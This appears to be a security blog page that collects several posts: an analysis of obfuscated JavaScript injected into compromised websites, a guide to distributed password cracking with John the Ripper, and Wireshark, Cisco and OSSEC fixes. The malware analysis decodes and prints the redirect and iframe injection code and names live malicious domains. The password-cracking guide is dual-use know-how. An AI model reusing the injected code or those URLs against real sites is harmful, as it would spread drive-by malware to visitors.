Encoded javascript (redirecting to blackhole and other exploit kits) or to build a remote call.

red-eye-170Today I found several malicious iframe on a compromised website. These iframes are composed of codes hidden inside one of the main pages, i will share with you guys some examples that i’ve found below:

Encoded String:


We can easily decrypt  the string above, into this:

Decoded String Result:

<script language=javascript>parent.window.opener.location="http://sexualne.info/main.php";</script>

OK let’s look inside the main.php

<script language='JavaScript'> <!--
window.location.href = "http://putanapartners.com/go.php?p=10018"
// --> </script>

Now we have found that the href function will make a redirect to the url http://putanapartners.com/go.php?p=10018, from inside of my sandbox i will make a request with curl

curl --user-agent "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)" http://putanapartners.com/go.php?p=10018

A requisição HTTP foi enviada, aguardando resposta… 302 Found

http://putana.cz/?p=10018 [redirecionando]

–2013-07-30 18:39:57– http://putana.cz/?p=10018

The 302 redirect means that the page was temporarily moved, then we got redirected to another url http://putana.cz/?p=10018

With fakenet enabled inside my sandbox (Windows XP 32 bits) i figured out that all java scripts are redirected to landing pages that loads up the malicious Java content, see below the result:

All of encoded javascripts loads malware from:


Some Informations :

IP address information :

Domain sexualne.info is at: (mail.m-hoster-4.ru)

Another interesting  function that I have found inside another compromised website,

var temp="",i,c=0,out="";

var str="60!102!114!97!109!101!115!101!116!32!114!111!119!115!61!34!49!48!48!37!34!32!102!114!97!109!101!98!111!114!100!101!114!61!34!48!34!32!102!114!97!109!101!115!112!97!99!105!110!103!61!34!48!34!62!13!10!60!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!115!101!120!117!97!108!110!101!46!105!110!102!111!34!32!102!114!97!109!101!98!111!114!100!101!114!61!34!48!34!32!109!97!114!103!105!110!119!105!100!116!104!61!34!48!34!32!109!97!114!103!105!110!104!101!105!103!104!116!61!34!48!34!62!13!10!60!47!102!114!97!109!101!115!101!116!62!";


while(str.charAt(c)!='!') temp=temp+str.charAt(c++);c++; out=out+String.fromCharCode(temp);temp="";

This is not the first time that I have found the function that uses this character substitution in conjunction with the String.fromCharCode function which converts the unicode into characters.

Example :

Convert a Unicode number into a character:

var n = String.fromCharCode(65);

The result of n will be:


The function above will look inside the string “str”, so ..while the character of the string is not “!”   the function will convert the unicode into a character:

Decoded Function Result :

<frameset rows="100%" frameborder="0" framespacing="0">

src="http://sexualne.info/go.php" frameborder="0" marginwidth="0" marginheight="0">


<script language='JavaScript'> <!--
window.location.href = "http://dosugof.altervista.org/d107e.php" <-------------------------------------
// --> </script>

This is the complete list of all php files that loads malware:


Distributed password cracking with John The Ripper and MPI

This article has been updated to reflect the changes for John version 1.7.8 as released in june 2011. The most important change is the fact that MPI support is now integrated in the jumbo patch.

The original John the Ripper off-line password cracker only uses a single processor (core) when performing brute-force or dictionary attacks.

JtR does not use multiple cores (or machines). However, there is a patch available that enables support of MPI. MPI allows you to distribute the workload of a program across multiple instances, thus cores or even machines, but your application must support it.

The fun thing with MPI is that it is very easy to create a password cracking cluster. But for now let’s just focus on using all these unused CPU cores to help us with cracking passwords.

I am using Ubuntu and Debian Linux as my platform but Mac OS X works also perfectly.

install MPI support

Note: Mac users have mpi support installed by default and don’t need to install this.

  • apt-get install libopenmpi-dev openmpi-bin

download John the Ripper with extra patches

  • Get the john-1.7.8-jumbo-2.tar.gz file.

extract John & edit the Make file

  • tar xzf john-1.7.8-jumbo-2.tar.gz
  • cd john-1.7.8-jumbo-2/src
  • uncomment the following lines in the Makefile:

    MPIOBJ = john-mpi.o`

Compile John the Ripper with MPI support

  • Run make and choose the most appropriate processor architecture. Example:

    make linux-x86-64 (for 64-bit i386)
    make linux-x86-sse2 (for 32-bit i386)
    make macosx-x86-64 (for 64 bit Mac OS X)

Test john the Ripper

  • cd ../run
  • ./john –test

Look at the benchmark values of the first test and remember them. Now let’s see if MPI does any better:

  • mpirun -np [number of processor (virtual) cores] ./john –test

Let’s asume that you have an iMac 27″ with a Core i7 with 4 real cores and hyper threading enabled. This will provide a total of 8 virtual cores.

  • mpirun -np 8 ./john –test

If you notice a significant increase in performance, you know that MPI is working properly.

Some benchmarks without and with MPI support (Traditional DES)

These are the benchmark test results when using a single core on an old Nehalem Core i7 920:

Many salts: 2579K c/s real, 2579K c/s virtual
Only one salt:  2266K c/s real, 2266K c/s virtual

These are the benchmark test results when using MPI and thus all 8 cores:

Many salts: 11015K c/s real, 11015K c/s virtual
Only one salt:  9834K c/s real, 9834K c/s virtual

And just look at the performance improvement when we overclock from 2,66 to 3,6 Ghz:

Many salts: 15004K c/s real, 15004K c/s virtual
Only one salt:  13232K c/s real, 13232K c/s virtual

That is very significant. Now admire how the Core i7 920 @ 3.6 Ghz is blown away by the Sandy bridge based Core i7-2600 @ 3.4 Ghz:

Many salts: 20007K c/s real, 20209K c/s virtual
Only one salt:  16881K c/s real, 16881K c/s virtual

Setting up an MPI cluster

MPI clustering is based on using SSH keys. There is a single master that uses all nodes to perform the computation. The nodes are put into a text file nodes.txt like this:

node01  slots=2
node02  slots=2
node03  slots=4 
node04  slots=4

In this example, node 2 and 3 are dual-core systems, while node 3 and 4 are installed with quad-core processors. You must create an account on all your nodes with the same name that is used on the master, when running the master process. You also must generate a private SSH key and distribute the public part as the authorized_keys file to all nodes. This is outside the scope of this post. Please note that the SSH private key should be loaded with ssh-agent if used with a passphrase, or do not configure a passphrase on the key. If you do not use a pass phrase, understand that anyone with access to the key can access all nodes.

You may also have to put the nodexx entries in your /etc/hosts file if the names cannot be resolved by DNS.

Now I’m assuming that you are able to ssh into all nodes without requireing a password, thus ssh is properly setup.

* mpirun -np 12 -hostfile nodes.txt ./john --test

Now you should see increased performance, beyond the limit of a single host.

Some benchmarks

I ran a password cracking test on some data using a large dictionary. These are the performance differences when using all 8 cores of my Core i7 920 instead of just one:

single: 0:00:04:48      c/s: 11192K
mpi:    0:00:01:26      c/s: 46568K

The performance increase is significant.


Original Source of this article : http://louwrentius.com/blog/2011/02/parallel-/-distributed-password-cracking-with-john-the-ripper-and-mpi/

Solving the No interfaces problem with Wireshark in Ubuntu 10.10

Run the following in the Terminal:


sudo addgroup -quiet -system wireshark
sudo chown root:wireshark /usr/bin/dumpcap
sudo setcap cap_net_raw,cap_net_admin=eip /usr/bin/dumpcap

Then run the following changing YOUR_USER_NAME onto your user name:

sudo usermod -a -G wireshark YOUR_USER_NAME

That’s it. No need to restart or even log off. Just start Wireshark and select the network interface.

I just went to Capture -> Interfacess… and clicked the Start button for eth0:

original post http://stream-recorder.com/forum/solving-no-interfaces-problem-wireshark-ubuntu-10-t8742.html?s=d89112d83a513ee8791e9a3aea89a738&amp;

Why Cisco ASA Don’t Have Telnet or SSH Clients ?

Many people ask me about this question and always this start a new discussion, all because the general view from the “security industry” is that implementation of telnet / SSH clients onto firewalls creates unacceptable security risk. This is because the use of client can be used to effectively bypass the firewall – that is, a user can SSH into the firewall, then SSH out from the firewall and then represents a security breach under most corporate security policies.

I agree that a hardened system should have only necessary software installed. But I don’t think a SSH or Telnet client is a security risk. If an attacker was able to access the firewall the game is already somewhat lost. He could just configure port forwarding and access hosts behind the firewall via telnet/ssh that way.

Well, recent ASA versions (8.4 and above) now have tcp “ping”

“TCP ping allows users whose ICMP echo requests are blocked to check connectivity over TCP.
With the TCP ping enhancement you can specify a source IP address and a port and source interface to send pings to a hostname or an IPv4 address.
We modified the following command: ping tcp.”

This is a very very good news, now we can troubleshooting connections in a firewall, using the tcp ping to help, example follows bellow:

FW-Diveo/pri# ping tcp inside 22
Type escape sequence to abort.
No source specified. Pinging from identity interface.
Sending 5 TCP SYN requests to port 22
from, timeout is 2 seconds:
Success rate is 100 percent (5/5), round-trip min/avg/max = 4/4/4 ms

analysisd error message after upgrade to ossec 2.6

There’s a small bug in ossec-control. The path for ossec-logtest is
missing the bin directory, to quick fix the issue

# ln -s /var/ossec/bin/ossec-logtest /var/ossec/ossec-logtest


BTW in the latest snapshot has it fixed:

https://bitbucket.org/dcid/ossec-hids (just go to get source)

CISCO IME “IOException when try to get certificate: “

Quando utilizamos o cisco IME para conectar no IPS, o device retorna a seguinte mensagem : 

“IOException when try to get certificate:

Para resolver este problema, precisamos logar no modulo de IPS, e executar o seguinte comando em EXEC mode:

sensor#tls generate−key

Metasploit: The Penetration Tester’s Guide

Book Description

“The best guide to the Metasploit Framework.” —HD Moore, Founder of the Metasploit Project

The Metasploit Framework makes discovering, exploiting, and sharing vulnerabilities quick and relatively painless. But while Metasploit is used by security professionals everywhere, the tool can be hard to grasp for first-time users. Metasploit: The Penetration Tester’s Guide fills this gap by teaching you how to harness the Framework and interact with the vibrant community of Metasploit contributors.

Once you’ve built your foundation for penetration testing, you’ll learn the Framework’s conventions, interfaces, and module system as you launch simulated attacks. You’ll move on to advanced penetration testing techniques, including network reconnaissance and enumeration, client-side attacks, wireless attacks, and targeted social-engineering attacks.

Learn how to:

  • Find and exploit unmaintained, misconfigured, and unpatched systems
  • Perform reconnaissance and find valuable information about your target
  • Bypass anti-virus technologies and circumvent security controls
  • Integrate Nmap, NeXpose, and Nessus with Metasploit to automate discovery
  • Use the Meterpreter shell to launch further attacks from inside the network
  • Harness standalone Metasploit utilities, third-party tools, and plug-ins
  • Learn how to write your own Meterpreter post exploitation modules and scripts

You’ll even touch on exploit discovery for zero-day research, write a fuzzer, port existing exploits into the Framework, and learn how to cover your tracks. Whether your goal is to secure your own networks or to put someone else’s to the test, Metasploit: The Penetration Tester’s Guide will take you there and beyond.

Book Details

  • Paperback: 328 pages
  • Publisher: No Starch Press (July 2011)
  • Language: English
  • ISBN-10: 159327288X
  • ISBN-13: 978-1593272883
  • File Size: 18.6 MiB
  • Hits: 4,818 times